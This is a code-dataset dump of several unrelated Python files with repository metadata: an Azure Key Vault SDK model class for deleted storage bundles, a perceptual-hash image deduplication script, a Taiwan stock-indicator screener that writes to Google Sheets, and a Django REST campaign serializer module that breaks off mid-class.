] | null | null | null | sdk/keyvault/azure-keyvault/azure/keyvault/v7_3_preview/models/deleted_storage_bundle_py3.py | mccoyp/azure-keyvault-7.3-preview | da351753a9d3d2bf97c27566865cd88bae7faa55 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .storage_bundle_py3 import StorageBundle
class DeletedStorageBundle(StorageBundle):
    """A soft-deleted storage account bundle.

    Carries the account's previous id, attributes and tags plus the
    recovery/purge bookkeeping needed to restore or permanently remove it.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: The storage account id.
    :vartype id: str
    :ivar resource_id: The storage account resource id.
    :vartype resource_id: str
    :ivar active_key_name: The current active storage account key name.
    :vartype active_key_name: str
    :ivar auto_regenerate_key: whether keyvault should manage the storage
     account for the user.
    :vartype auto_regenerate_key: bool
    :ivar regeneration_period: The key regeneration time duration specified in
     ISO-8601 format.
    :vartype regeneration_period: str
    :ivar attributes: The storage account attributes.
    :vartype attributes: ~storage.models.StorageAccountAttributes
    :ivar tags: Application specific metadata in the form of key-value pairs
    :vartype tags: dict[str, str]
    :param recovery_id: The url of the recovery object, used to identify and
     recover the deleted storage account.
    :type recovery_id: str
    :ivar scheduled_purge_date: The time when the storage account is scheduled
     to be purged, in UTC
    :vartype scheduled_purge_date: datetime
    :ivar deleted_date: The time when the storage account was deleted, in UTC
    :vartype deleted_date: datetime
    """

    # Every server-populated field is read-only; the field list is stated
    # once and the per-field dicts are generated from it.
    _validation = {
        _name: {'readonly': True}
        for _name in (
            'id',
            'resource_id',
            'active_key_name',
            'auto_regenerate_key',
            'regeneration_period',
            'attributes',
            'tags',
            'scheduled_purge_date',
            'deleted_date',
        )
    }

    # Wire-format mapping; entry order is preserved from the generated code.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'resource_id': {'key': 'resourceId', 'type': 'str'},
        'active_key_name': {'key': 'activeKeyName', 'type': 'str'},
        'auto_regenerate_key': {'key': 'autoRegenerateKey', 'type': 'bool'},
        'regeneration_period': {'key': 'regenerationPeriod', 'type': 'str'},
        'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'recovery_id': {'key': 'recoveryId', 'type': 'str'},
        'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'},
        'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'},
    }

    def __init__(self, *, recovery_id: str=None, **kwargs) -> None:
        super(DeletedStorageBundle, self).__init__(**kwargs)
        self.recovery_id = recovery_id
        # Server-populated; initialized to None and never sent in requests.
        self.scheduled_purge_date = None
        self.deleted_date = None
| 43.115385 | 83 | 0.641094 |
from .storage_bundle_py3 import StorageBundle
class DeletedStorageBundle(StorageBundle):
_validation = {
'id': {'readonly': True},
'resource_id': {'readonly': True},
'active_key_name': {'readonly': True},
'auto_regenerate_key': {'readonly': True},
'regeneration_period': {'readonly': True},
'attributes': {'readonly': True},
'tags': {'readonly': True},
'scheduled_purge_date': {'readonly': True},
'deleted_date': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'active_key_name': {'key': 'activeKeyName', 'type': 'str'},
'auto_regenerate_key': {'key': 'autoRegenerateKey', 'type': 'bool'},
'regeneration_period': {'key': 'regenerationPeriod', 'type': 'str'},
'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
'tags': {'key': 'tags', 'type': '{str}'},
'recovery_id': {'key': 'recoveryId', 'type': 'str'},
'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'},
'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'},
}
def __init__(self, *, recovery_id: str=None, **kwargs) -> None:
super(DeletedStorageBundle, self).__init__(**kwargs)
self.recovery_id = recovery_id
self.scheduled_purge_date = None
self.deleted_date = None
| true | true |
f7fa56e1a0d8e96cef92233154f85df4df1ee54e | 3,875 | py | Python | run_phash.py | levan92/imagededup | f89eb2377712470da868cbe7e5bbf7dfd77af124 | [
"Apache-2.0"
] | 1 | 2020-07-15T01:01:25.000Z | 2020-07-15T01:01:25.000Z | run_phash.py | levan92/imagededup | f89eb2377712470da868cbe7e5bbf7dfd77af124 | [
"Apache-2.0"
] | null | null | null | run_phash.py | levan92/imagededup | f89eb2377712470da868cbe7e5bbf7dfd77af124 | [
"Apache-2.0"
] | 1 | 2021-03-08T05:05:30.000Z | 2021-03-08T05:05:30.000Z | import time
import argparse
import pickle
import random
from pathlib import Path
from shutil import copy
from clustering import clustering
from imagededup.methods import PHash

parser = argparse.ArgumentParser()
parser.add_argument('directory', help='Path to root directory of images')
parser.add_argument('--thresh', help='distance threshold (hamming distance) int between 0 and 64. Default: 10', default=10, type=int)
parser.add_argument('--get-clusters', help='if flagged, will copy images over to <input name>_Dups_thresh{thresh} output folder in their computed clusters subdirectories', action='store_true')
parser.add_argument('--dedup', help='if flagged, will copy images over to <input name>_deduped with images randomly sampled', action='store_true')
parser.add_argument('--cluster-num', help='max num of samples from each cluster (if dedup is flagged).', type=int)
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--save', help='save encoding map (phash of images) as pkl', action='store_true')
cache_group.add_argument('--load', help='load encoding map (phash of images) from pkl', type=str)
args = parser.parse_args()

# Validate CLI input explicitly instead of via `assert` (asserts are
# stripped under `python -O` and give unhelpful tracebacks).
dist_thresh = args.thresh  # already an int via argparse type=int
if not 0 <= dist_thresh <= 64:
    parser.error('--thresh must be between 0 and 64 (got {})'.format(dist_thresh))
root_dir = Path(args.directory)
if not root_dir.is_dir():
    parser.error('directory is not an existing folder: {}'.format(root_dir))

phasher = PHash()

# Reuse a cached encoding map when --load points at an existing pickle;
# otherwise perceptually hash every image under root_dir (recursively).
if args.load is not None and Path(args.load).is_file():
    with open(args.load, 'rb') as fh:
        encoding_map = pickle.load(fh)
    print(f'Encoding map loaded from pickle file: {args.load}!')
else:
    tic = time.perf_counter()
    encoding_map = phasher.encode_images(image_dir=root_dir, rglob=True)
    toc = time.perf_counter()
    print(f'encoding duration: {toc-tic:.3f}s')
    if args.save:
        pickle_file = f"{root_dir.stem}_encoding_map.pkl"
        with open(pickle_file, "wb") as fh:
            pickle.dump(encoding_map, fh)
        print(f'Encoding map dumped as pickle at: {pickle_file}')

# Pairwise hamming-distance search within the threshold.
tic = time.perf_counter()
distance_map = phasher.find_duplicates(encoding_map=encoding_map, max_distance_threshold=dist_thresh, scores=True)
toc = time.perf_counter()
print(f'find dups duration: {toc-tic:.3f}s')

# Group mutually-similar images into clusters.
tic = time.perf_counter()
clusters = clustering(distance_map)
toc = time.perf_counter()
print(f'clustering duration: {toc-tic:.4f}s')

print('Original number of images:', len(encoding_map))
print('Num of clusters:', len(clusters))
cluster_counts = [len(x) for x in clusters]
print('Clusters size distribution:', cluster_counts)

if args.get_clusters:
    # Copy each cluster's images into its own numbered subdirectory.
    clusters_out_dir = root_dir.parent / '{}_Dups_thresh{}'.format(root_dir.stem, dist_thresh)
    print('Generating clusters at ', clusters_out_dir)
    for cluster_idx, cluster in enumerate(clusters):
        cluster_dir = clusters_out_dir / '{}'.format(cluster_idx)
        cluster_dir.mkdir(exist_ok=True, parents=True)
        for fn in cluster:
            copy(root_dir / fn, cluster_dir)

if args.dedup:
    # Keep at most `sampling` random representatives from each cluster.
    out_dir = root_dir.parent / '{}_deduped'.format(root_dir.stem)
    out_dir.mkdir(exist_ok=True, parents=True)
    print('Generating deduplicated images at', out_dir)
    sampling = args.cluster_num
    if not sampling:
        sampling = int(input('Pls give max num of samples you want from each clusters: '))
    print('Max num of samples from each cluster:', sampling)
    sampled_count = 0
    for cluster in clusters:
        if len(cluster) > sampling:
            sampled = random.sample(cluster, k=sampling)
        else:
            sampled = cluster
        for fn in sampled:
            copy(root_dir / fn, out_dir)
            sampled_count += 1
    print('Sampled total count: ', sampled_count)
| 39.948454 | 192 | 0.709935 | import time
import argparse
from pathlib import Path
from shutil import copy
from clustering import clustering
from imagededup.methods import PHash
parser = argparse.ArgumentParser()
parser.add_argument('directory', help='Path to root directory of images')
parser.add_argument('--thresh', help='distance threshold (hamming distance) int between 0 and 64. Default: 10', default=10, type=int)
parser.add_argument('--get-clusters', help='if flagged, will copy images over to <input name>_Dups_thresh{thresh} output folder in their computed clusters subdirectories', action='store_true')
parser.add_argument('--dedup', help='if flagged, will copy images over to <input name>_deduped with images randomly sampled', action='store_true')
parser.add_argument('--cluster-num', help='max num of samples from each cluster (if dedup is flagged).', type=int)
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--save', help='save encoding map (phash of images) as pkl', action='store_true')
cache_group.add_argument('--load', help='load encoding map (phash of images) from pkl', type=str)
args = parser.parse_args()
dist_thresh = int(args.thresh)
assert 0 <= dist_thresh <=64
root_dir = Path(args.directory)
assert root_dir.is_dir()
out_dir = root_dir.parent / 'Dups_thresh{}'.format(dist_thresh)
phasher = PHash()
if args.load is not None and Path(args.load).is_file():
import pickle
encoding_map = pickle.load(open(args.load, 'rb'))
print(f'Encoding map loaded from pickle file: {args.load}!')
else:
tic = time.perf_counter()
encoding_map = phasher.encode_images(image_dir=root_dir, rglob=True)
toc = time.perf_counter()
print(f'encoding duration: {toc-tic:.3f}s')
if args.save:
import pickle
pickle_file = f"{root_dir.stem}_encoding_map.pkl"
pickle.dump(encoding_map, open(pickle_file,"wb"))
print(f'Encoding map dumped as pickle at: {pickle_file}')
tic = time.perf_counter()
distance_map = phasher.find_duplicates(encoding_map=encoding_map, max_distance_threshold=dist_thresh, scores=True)
toc = time.perf_counter()
print(f'find dups duration: {toc-tic:.3f}s')
tic = time.perf_counter()
clusters = clustering(distance_map)
toc = time.perf_counter()
print(f'clustering duration: {toc-tic:.4f}s')
print('Original number of images:', len(encoding_map))
print('Num of clusters:', len(clusters))
cluster_counts = [ len(x) for x in clusters ]
print('Clusters size distribution:', cluster_counts)
if args.get_clusters:
clusters_out_dir = root_dir.parent / '{}_Dups_thresh{}'.format(root_dir.stem, dist_thresh)
print('Generating clusters at ', clusters_out_dir)
for cluster_idx, cluster in enumerate(clusters):
cluster_dir = clusters_out_dir / '{}'.format(cluster_idx)
cluster_dir.mkdir(exist_ok=True, parents=True)
for fn in cluster:
src_path = root_dir / fn
copy(src_path, cluster_dir)
if args.dedup:
import random
out_dir = root_dir.parent / '{}_deduped'.format(root_dir.stem)
out_dir.mkdir(exist_ok=True, parents=True)
print('Generating deduplicated images at', out_dir)
sampling = args.cluster_num
if not sampling:
sampling = int(input('Pls give max num of samples you want from each clusters: '))
print('Max num of samples from each cluster:', sampling)
sampled_count = 0
for cluster in clusters:
if len(cluster) > sampling:
sampled = random.sample(cluster, k=sampling)
else:
sampled = cluster
for fn in sampled:
src_path = root_dir / fn
copy(src_path, out_dir)
sampled_count += 1
print('Sampled total count: ', sampled_count)
| true | true |
f7fa56f251ff4d397528035160fc02c57dae6c8b | 6,063 | py | Python | Tw.finance.py | yejh90093/Py.finance | e5c660970d4bb890cbf401d288d70829d3e6c966 | [
"Apache-2.0"
] | null | null | null | Tw.finance.py | yejh90093/Py.finance | e5c660970d4bb890cbf401d288d70829d3e6c966 | [
"Apache-2.0"
] | null | null | null | Tw.finance.py | yejh90093/Py.finance | e5c660970d4bb890cbf401d288d70829d3e6c966 | [
"Apache-2.0"
] | null | null | null | import os
import numpy
import requests
import datetime
import time
import math
import pandas as pd
import functions
import xlwt
import numpy as np
from tqdm import tqdm
import gspread
from gspread_dataframe import set_with_dataframe
from oauth2client.service_account import ServiceAccountCredentials

# --- configuration -----------------------------------------------------------
debug_mode = False       # when True: recreate a "Debug-" sheet and stop early
save_local_file = False  # when True: also dump results to local Excel files
start_index = 800        # in debug mode, skip stocks before this progress index

currentDate = datetime.datetime.utcnow()
dateStr = currentDate.strftime("%Y-%m-%d") if not debug_mode else "Debug-" + currentDate.strftime("%Y-%m-%d")

# --- Google Sheets setup -----------------------------------------------------
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
credentials = ServiceAccountCredentials.from_json_keyfile_name('tw-finance-f09c6b5d4a8c.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open('Tw-finance')
try:
    if debug_mode:
        # Recreate the debug sheet from scratch if it already exists.
        try:
            ws = sh.worksheet(dateStr)
            sh.del_worksheet(ws)
            print("Delete exist sheet: " + dateStr)
        except Exception:
            print("Create new sheet: " + dateStr)
    ws = sh.add_worksheet(title=dateStr, rows='1000', cols='12')
except Exception as e:
    print(e)
    print("Cannot add worksheet. Please check if the sheet already exist.")
    exit(1)

# --- phase 1: daily/monthly indicators for every stock -----------------------
pbar = tqdm(total=972)  # approximate number of listed stocks
dayStart = str(int(time.time()))
dayEnd = str(int(time.time()) - 8640000)      # 100 days back
monthEnd = str(int(time.time()) - 686400000)  # ~21.8 years back

# `all_stocks` (renamed from `all`, which shadowed the builtin):
# column 0 = ticker, column 1 = name.
all_stocks = functions.readAll()
resultDic = {}
tempArr = []
nameArr = []
dayWilliamsRArr = []
dayRSIArr = []
monthRSIArr = []
monthMTMArr = []
monthDMIArr_plus = []
monthDMIArr_minus = []
process = 0
for value in all_stocks.values:
    pbar.update(1)
    if debug_mode and pbar.n < start_index:
        continue
    tempArr.append(value[0])
    nameArr.append(value[1])
    responseDay = functions.getFinanceData(value[0], dayStart, dayEnd, "1d")
    try:
        dataArrayDay = functions.dataTextToArray(responseDay.text)
    except Exception:
        # NOTE(review): this early exit leaves the per-stock arrays with
        # unequal lengths, so the DataFrame construction below may fail.
        sh.del_worksheet(ws)
        print()
        print("ERROR: dataTextToArray responseDay. Invalid cookie.")
        break
    arrWilliamsR = functions.arrayWilliamsR(dataArrayDay, 50)
    arrRSI = functions.arrayRSI(dataArrayDay, 60)
    # Latest-row indicator values (Williams %R at column 9, RSI at column 7).
    dayWilliamsRArr.append(arrWilliamsR[len(arrWilliamsR) - 1][9])
    dayRSIArr.append(arrRSI[len(arrRSI) - 1][7])
    responseMonth = functions.getFinanceData(value[0], dayStart, monthEnd, "1mo")
    try:
        dataArrayMonth = functions.dataTextToArray(responseMonth.text)
    except Exception:
        sh.del_worksheet(ws)
        print()
        print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
        break
    # Fold the last two monthly rows together (extend columns 2/3 —
    # presumably high/low, TODO confirm against dataTextToArray) and drop
    # the older of the two rows.
    arrSize = len(dataArrayMonth)
    if arrSize >= 2:
        if dataArrayMonth[arrSize - 1][2] < dataArrayMonth[arrSize - 2][2]:
            dataArrayMonth[arrSize - 1][2] = dataArrayMonth[arrSize - 2][2]
        if dataArrayMonth[arrSize - 1][3] > dataArrayMonth[arrSize - 2][3]:
            dataArrayMonth[arrSize - 1][3] = dataArrayMonth[arrSize - 2][3]
        dataArrayMonth = np.delete(dataArrayMonth, len(dataArrayMonth) - 2, axis=0)
    arrRSIMonth = functions.arrayRSI(dataArrayMonth, 4)
    arrDMIMonth = functions.arrayDMI(dataArrayMonth, 1)
    arrMTMMonth = functions.arrayMTM(dataArrayMonth, 3, 2)
    if len(arrRSIMonth) <= 1:
        monthRSI = None
    else:
        monthRSI = arrRSIMonth[len(arrRSIMonth) - 1][7]
    # Bug fix: the short-history branch previously set only a dead
    # `monthDMI` variable, so `monthDMI_plus/_minus` kept the PREVIOUS
    # stock's values (or raised NameError on the first stock).
    if len(arrDMIMonth) <= 1:
        monthDMI_plus = None
        monthDMI_minus = None
    else:
        monthDMI_plus = arrDMIMonth[len(arrDMIMonth) - 1][7]
        monthDMI_minus = arrDMIMonth[len(arrDMIMonth) - 1][8]
    if len(arrMTMMonth) <= 1:
        monthMTM = None
    else:
        monthMTM = arrMTMMonth[len(arrMTMMonth) - 1][9]
    monthRSIArr.append(monthRSI)
    monthMTMArr.append(monthMTM)
    monthDMIArr_plus.append(monthDMI_plus)
    monthDMIArr_minus.append(monthDMI_minus)
    process = process + 1
    if debug_mode and process > 30:
        break

# --- phase 2: assemble DataFrame and filter candidates -----------------------
resultDic['monthRSI'] = monthRSIArr
resultDic['monthMTM'] = monthMTMArr
resultDic['monthDMI_plus'] = monthDMIArr_plus
resultDic['monthDMI_minus'] = monthDMIArr_minus
resultDic['dayRSI'] = dayRSIArr
resultDic['dayWilliamsR'] = dayWilliamsRArr
resultDic[all_stocks.keys()[1]] = nameArr
resultDic[all_stocks.keys()[0]] = tempArr
resultDF = pd.DataFrame(resultDic)
pbar.close()
resultDF = resultDF.reindex(
    columns=['證券代號', '證券名稱', 'dayWilliamsR', 'dayRSI', 'monthRSI', 'monthDMI_plus', 'monthDMI_minus', 'monthMTM'])
# Screening rule: monthly RSI > 77, daily RSI > 57, daily Williams %R < 20.
accordDic = resultDF[resultDF.monthRSI > 77]
accordDic = accordDic[accordDic.dayRSI > 57]
accordDic = accordDic[accordDic.dayWilliamsR < 20]
if save_local_file:
    resultDF.to_excel('all_results_last.xls', sheet_name=dateStr)
    functions.append_df_to_excel('log_results.xlsx', accordDic, sheet_name=dateStr, index=False)
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)

# --- phase 3: monthly MACD for the shortlisted stocks ------------------------
listMACDWeekDiff = []
listMACDWeekDirection = []
pbar_MACD = tqdm(total=len(accordDic))
for index, row in accordDic.iterrows():
    responseWeek = functions.getFinanceData(row['證券代號'], dayStart, monthEnd, "1mo")
    try:
        dataArrayWeek = functions.dataTextToArray(responseWeek.text)
    except Exception:
        print()
        print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
        exit(1)
    arrMACDWeek = functions.arrayMACD(dataArrayWeek, 12, 26, 9)
    # Bug fix: always append exactly one entry per row so the column
    # assignments below match accordDic's length (empty MACD results were
    # previously skipped, which broke the assignment).
    if len(arrMACDWeek) > 0:
        listMACDWeekDiff.append(arrMACDWeek[len(arrMACDWeek) - 1][9])
        listMACDWeekDirection.append(arrMACDWeek[len(arrMACDWeek) - 1][10])
    else:
        listMACDWeekDiff.append(None)
        listMACDWeekDirection.append(None)
    pbar_MACD.update(1)
accordDic['MACD_Diff'] = listMACDWeekDiff
accordDic['MACD_Direction'] = listMACDWeekDirection
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
pbar_MACD.close()
| 29.289855 | 114 | 0.697674 | import os
import numpy
import requests
import datetime
import time
import math
import pandas as pd
import functions
import xlwt
import numpy as np
from tqdm import tqdm
import gspread
from gspread_dataframe import set_with_dataframe
from oauth2client.service_account import ServiceAccountCredentials
debug_mode = False
save_local_file = False
jump_phase_two = False
start_index = 800
currentDate = datetime.datetime.utcnow()
dateStr = currentDate.strftime("%Y-%m-%d") if not debug_mode else "Debug-" + currentDate.strftime("%Y-%m-%d")
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
credentials = ServiceAccountCredentials.from_json_keyfile_name('tw-finance-f09c6b5d4a8c.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open('Tw-finance')
try:
if debug_mode:
try:
ws = sh.worksheet(dateStr)
sh.del_worksheet(ws)
print("Delete exist sheet: " + dateStr)
except:
print("Create new sheet: " + dateStr)
ws = sh.add_worksheet(title=dateStr, rows='1000', cols='12')
except Exception as e:
print(e)
print("Cannot add worksheet. Please check if the sheet already exist.")
exit(1)
pbar = tqdm(total=972)
now = datetime.datetime.now()
dayStart = str(int(time.time()))
dayEnd = str(int(time.time()) - 8640000)
monthEnd = str(int(time.time()) - 686400000)
all = functions.readAll()
resultDic = {}
idArr = []
tempArr = []
nameArr = []
dayWilliamsRArr = []
dayRSIArr = []
monthRSIArr = []
monthMTMArr = []
monthDMIArr_plus = []
monthDMIArr_minus = []
process = 0
for value in all.values:
pbar.update(1)
if debug_mode and pbar.n < start_index:
continue
tempArr.append(value[0])
nameArr.append(value[1])
responseDay = functions.getFinanceData(value[0], dayStart, dayEnd, "1d")
try:
dataArrayDay = functions.dataTextToArray(responseDay.text)
except:
sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseDay. Invalid cookie.")
break
arrWilliamsR = functions.arrayWilliamsR(dataArrayDay, 50)
arrRSI = functions.arrayRSI(dataArrayDay, 60)
dayWilliamsR = arrWilliamsR[len(arrWilliamsR) - 1][9]
dayRSI = arrRSI[len(arrRSI) - 1][7]
dayWilliamsRArr.append(dayWilliamsR)
dayRSIArr.append(dayRSI)
responseMonth = functions.getFinanceData(value[0], dayStart, monthEnd, "1mo")
try:
dataArrayMonth = functions.dataTextToArray(responseMonth.text)
except:
sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
break
arrSize = len(dataArrayMonth)
if arrSize >= 2:
if dataArrayMonth[arrSize - 1][2] < dataArrayMonth[arrSize - 2][2]:
dataArrayMonth[arrSize - 1][2] = dataArrayMonth[arrSize - 2][2]
if dataArrayMonth[arrSize - 1][3] > dataArrayMonth[arrSize - 2][3]:
dataArrayMonth[arrSize - 1][3] = dataArrayMonth[arrSize - 2][3]
dataArrayMonth = np.delete(dataArrayMonth, len(dataArrayMonth) - 2, axis=0)
arrRSIMonth = functions.arrayRSI(dataArrayMonth, 4)
arrDMIMonth = functions.arrayDMI(dataArrayMonth, 1)
arrMTMMonth = functions.arrayMTM(dataArrayMonth, 3, 2)
if len(arrRSIMonth) <= 1:
monthRSI = None
else:
monthRSI = arrRSIMonth[len(arrRSIMonth) - 1][7]
if len(arrDMIMonth) <= 1:
monthDMI = None
else:
monthDMI_plus = arrDMIMonth[len(arrDMIMonth) - 1][7]
monthDMI_minus = arrDMIMonth[len(arrDMIMonth) - 1][8]
if len(arrMTMMonth) <= 1:
monthMTM = None
else:
monthMTM = arrMTMMonth[len(arrMTMMonth) - 1][9]
monthRSIArr.append(monthRSI)
monthMTMArr.append(monthMTM)
monthDMIArr_plus.append(monthDMI_plus)
monthDMIArr_minus.append(monthDMI_minus)
process = process + 1
if debug_mode and process > 30:
break
resultDic['monthRSI'] = monthRSIArr
resultDic['monthMTM'] = monthMTMArr
resultDic['monthDMI_plus'] = monthDMIArr_plus
resultDic['monthDMI_minus'] = monthDMIArr_minus
resultDic['dayRSI'] = dayRSIArr
resultDic['dayWilliamsR'] = dayWilliamsRArr
resultDic[all.keys()[1]] = nameArr
resultDic[all.keys()[0]] = tempArr
resultDF = pd.DataFrame(resultDic)
pbar.close()
resultDF = resultDF.reindex(
columns=['證券代號', '證券名稱', 'dayWilliamsR', 'dayRSI', 'monthRSI', 'monthDMI_plus', 'monthDMI_minus', 'monthMTM'])
accordDic = resultDF[resultDF.monthRSI > 77]
accordDic = accordDic[accordDic.dayRSI > 57]
accordDic = accordDic[accordDic.dayWilliamsR < 20]
if save_local_file:
resultDF.to_excel('all_results_last.xls', sheet_name=dateStr)
functions.append_df_to_excel('log_results.xlsx', accordDic, sheet_name=dateStr, index=False)
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
listMACDWeekDiff = []
listMACDWeekDirection = []
pbar_MACD = tqdm(total=len(accordDic))
for index, row in accordDic.iterrows():
responseWeek = functions.getFinanceData(row['證券代號'], dayStart, monthEnd, "1mo")
try:
dataArrayWeek = functions.dataTextToArray(responseWeek.text)
except:
print()
print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
exit(1)
arrMACDWeek = functions.arrayMACD(dataArrayWeek, 12, 26, 9)
if len(arrMACDWeek)>0:
listMACDWeekDiff.append(arrMACDWeek[len(arrMACDWeek)-1][9])
listMACDWeekDirection.append(arrMACDWeek[len(arrMACDWeek)-1][10])
pbar_MACD.update(1)
accordDic['MACD_Diff'] = list(pd.Series(listMACDWeekDiff))
accordDic['MACD_Direction'] = list(pd.Series(listMACDWeekDirection))
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
pbar_MACD.close()
| true | true |
f7fa56f85ee4447930f9aa334e3348214a0600f9 | 5,500 | py | Python | campaigns/serializers.py | alimahdiyar/Developing-Community-Web | a663a687e0f286f197d4a7bf347f67cd130275f7 | [
"MIT"
] | 2 | 2018-06-02T12:30:00.000Z | 2018-07-19T14:41:39.000Z | campaigns/serializers.py | Developing-Community/Developing-Community-Web | a663a687e0f286f197d4a7bf347f67cd130275f7 | [
"MIT"
] | 5 | 2021-06-08T19:09:00.000Z | 2022-03-11T23:25:14.000Z | campaigns/serializers.py | Developing-Community/web | a663a687e0f286f197d4a7bf347f67cd130275f7 | [
"MIT"
] | 2 | 2018-05-27T14:58:34.000Z | 2018-05-27T15:03:04.000Z | from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from enumfields.drf.serializers import EnumSupportSerializerMixin
from rest_framework.fields import SerializerMethodField
from rest_framework.serializers import (
ModelSerializer
)
from sorl_thumbnail_serializer.fields import HyperlinkedSorlImageField
from campaigns.models import Product, Campaign, CampaignPartyRelation, CampaignPartyRelationType, \
CampaignEnrollmentRequest
from team.serializers import TeamListSerializer
User = get_user_model()
class CampaignCreateSerializer(EnumSupportSerializerMixin, ModelSerializer):
    """Writable serializer for creating a Campaign (basic fields only)."""
    class Meta:
        model = Campaign
        fields = [
            'id',
            'title',
            'start_time',
            'end_time',
            'description',
        ]
class CampaignListSerializer(EnumSupportSerializerMixin, ModelSerializer):
    """Read serializer for campaign list views.

    Adds the creator's display name and a 500x500 center-cropped thumbnail
    derived from the campaign's ``image`` field.
    """
    creator = SerializerMethodField()
    # A thumbnail image, sorl options and read-only
    thumbnail = HyperlinkedSorlImageField(
        '500x500',
        options={"crop": "center"},
        source='image',
        read_only=True
    )
    class Meta:
        model = Campaign
        fields = [
            'id',
            'title',
            'creator',
            'start_time',
            'end_time',
            'description',
            'thumbnail',
            'image',
            'width_field',
            'height_field',
        ]
        read_only_fields = [
            'thumbnail',
            'image',
            'width_field',
            'height_field',
        ]
    def get_creator(self, obj):
        """Return the display name of the campaign's CREATOR party.

        NOTE(review): assumes exactly one CREATOR relation exists per
        campaign; ``.get()`` raises otherwise — confirm data invariant.
        """
        return CampaignPartyRelation.objects.get(
            campaign=obj,
            type=CampaignPartyRelationType.CREATOR,
        ).content_object.name
class CampaignUpdateSerializer(EnumSupportSerializerMixin, ModelSerializer):
    """Writable serializer for updating a Campaign's editable fields."""
    class Meta:
        model = Campaign
        fields = [
            'id',
            'title',
            'start_time',
            'end_time',
            'description',
        ]
class CampaignDetailSerializer(EnumSupportSerializerMixin, ModelSerializer):
    """Read serializer for the campaign detail view.

    Exposes per-request flags (``accessable``, ``requested``, ``enrolled``)
    computed against ``request.user``, the creator's name, and a thumbnail.
    """
    accessable = SerializerMethodField()
    creator = SerializerMethodField()
    requested = SerializerMethodField()
    enrolled = SerializerMethodField()
    # A thumbnail image, sorl options and read-only
    # NOTE(review): sourced from 'profile_image' while the list serializer
    # uses 'image' — confirm Campaign actually has a 'profile_image' field.
    thumbnail = HyperlinkedSorlImageField(
        '500x500',
        options={"crop": "center"},
        source='profile_image',
        read_only=True
    )
    # A larger version of the image, allows writing
    # profile_image = HyperlinkedSorlImageField('1024')
    class Meta:
        model = Campaign
        fields = [
            'id',
            'title',
            'creator',
            'type',
            'description',
            'start_time',
            'end_time',
            'accessable',
            'requested',
            'enrolled',
            'thumbnail',
            'image',
            'width_field',
            'height_field',
        ]
        read_only_fields = [
            'thumbnail',
            'image',
            'width_field',
            'height_field',
        ]
    def get_accessable(self, obj):
        """True when the requesting user is this campaign's CREATOR.

        NOTE(review): the lookup uses the 'profile' content type with
        ``object_id=user.id`` — assumes Profile pk equals User pk; confirm.
        """
        user = self.context.get('request').user
        if user.is_authenticated and CampaignPartyRelation.objects.filter(
                campaign=obj,
                type=CampaignPartyRelationType.CREATOR,
                content_type=ContentType.objects.get(model="profile"),
                object_id=user.id
        ).exists():
            return True
        return False
    def get_creator(self, obj):
        """Return the display name of the campaign's CREATOR party."""
        return CampaignPartyRelation.objects.get(
            campaign=obj,
            type=CampaignPartyRelationType.CREATOR,
        ).content_object.name
    def get_requested(self, obj):
        """True when the user has an enrollment request for this campaign."""
        user = self.context.get('request').user
        if user.is_authenticated and CampaignEnrollmentRequest.objects.filter(
                campaign=obj,
                user=user
        ).exists():
            return True
        return False
    def get_enrolled(self, obj):
        """True when the user is a MEMBER of this campaign (via the 'user'
        content type)."""
        user = self.context.get('request').user
        if user.is_authenticated and CampaignPartyRelation.objects.filter(
                campaign=obj,
                type=CampaignPartyRelationType.MEMBER,
                content_type=ContentType.objects.get(model="user"),
                object_id=user.id
        ).exists():
            return True
        return False
class CampaignImageUpdateRetriveSerializer(ModelSerializer):
    """Serializer for uploading/retrieving a campaign's image.

    The image dimensions are server-populated and read-only.
    (Name keeps the historical 'Retrive' typo — renaming would break
    existing imports.)
    """
    class Meta:
        model = Campaign
        fields = [
            'image',
            'width_field',
            'height_field',
        ]
        read_only_fields = [
            'width_field',
            'height_field',
        ]
class CampaignDeleteSerializer(EnumSupportSerializerMixin, ModelSerializer):
    """Serializer for the campaign delete endpoint; exposes only the id."""
    class Meta:
        model = Campaign
        fields = [
            'id',
        ]
class CampaignRequestEnrollmentSerializer(ModelSerializer):
    """Serializer for submitting an enrollment request (free-text note)."""
    class Meta:
        model = CampaignEnrollmentRequest
        fields = [
            'note'
        ]
class ProductCreateSerializer(ModelSerializer):
    """Writable serializer for creating a Product."""
    class Meta:
        model = Product
        fields = [
            'name',
            'description',
            'price'
        ]
class ProductListSerializer(ModelSerializer):
    """Read serializer for product lists; nests the selling team's data."""
    # Nested read of the seller via the team list serializer.
    seller = TeamListSerializer()
    class Meta:
